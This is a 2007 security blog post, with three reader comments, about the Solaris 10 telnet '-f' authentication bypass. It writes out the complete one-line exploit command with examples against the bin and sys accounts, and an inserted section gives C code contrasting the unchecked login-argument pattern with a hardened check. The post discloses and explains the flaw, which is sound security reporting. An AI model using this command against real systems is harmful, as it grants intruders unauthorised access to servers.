Tuesday, February 13, 2007

How long does it take to remotely hack a fully patched Solaris 10 installation with telnet enabled? As long as it takes to type this simple standard system command:

telnet -l"-fusername" host

i.e.

telnet -l"-fbin" solaris10-server

or

telnet -l"-fsys" 127.0.0.1

Yeah, it's that simple. Here's a screenshot:

Information about this 0-day vulnerability appeared on a security news list today and spread like wildfire.

Certainly, most organisations which take security seriously will use SSH and disable telnet. However, considering that this vulnerability affects a default system installation, it is likely that companies using Solaris 10 without a strong security configuration will be seriously affected.

That's truly a return of the "good" old days for hackers, when hacking into any server was a trivial task that required only a simple command. Seeing this type of vulnerability these days is extremely unusual and pretty much shocking for the IT security community. Most of all, it is a terrible embarrassment for Sun Microsystems.
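The command works because the telnet daemon hands the client-supplied login name to login as an argument, and login reads a leading -f as "this user is already authenticated". The C below is an added example, not code from this post or from Sun: the function names, the 32-character limit and the simplified argv are assumptions, and it shows the unchecked pattern beside a version that refuses option-like names.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAX_LOGIN_NAME 32   /* assumed limit for this sketch */

/* Returns 1 if name is safe to pass to login as a user-name operand. */
int login_name_ok(const char *name)
{
    size_t len, i;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > MAX_LOGIN_NAME)
        return 0;
    if (name[0] == '-')     /* "-fbin" would be parsed as option -f, user bin */
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Unchecked pattern: whatever the client sent lands in argv as-is. */
void build_login_argv_unsafe(const char *user, const char *argv[3])
{
    argv[0] = "login";
    argv[1] = user;
    argv[2] = NULL;
}

/* Hardened: on a bad name, pass no user operand so login prompts
 * for both name and password. Returns 0 on success, -1 on rejection. */
int build_login_argv(const char *user, const char *argv[3])
{
    argv[0] = "login";
    argv[1] = NULL;
    argv[2] = NULL;
    if (!login_name_ok(user))
        return -1;
    argv[1] = user;
    return 0;
}
```

A rejection from build_login_argv is also worth logging, since a login name beginning with "-" has no legitimate use.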

3 comments:

Tedi Heriyanto said...

Hi Marek,

You may be aware that this vulnerability doesn't affect Solaris 2.6 - 9.0 as discussed in vulnerability mailing list (http://whitestar.linuxbox.org/pipermail/exploits/2007-February/000104.html).

Marek Bialoglowy said...

Sure, that's why I wrote "Solaris 10, 11" in the post title :-)

Old Monkey said...

LOL :) Yeah ... I have a Solaris Box at Home and had Telnet enabled. Luckily it is still the old Solaris 9.0 :)
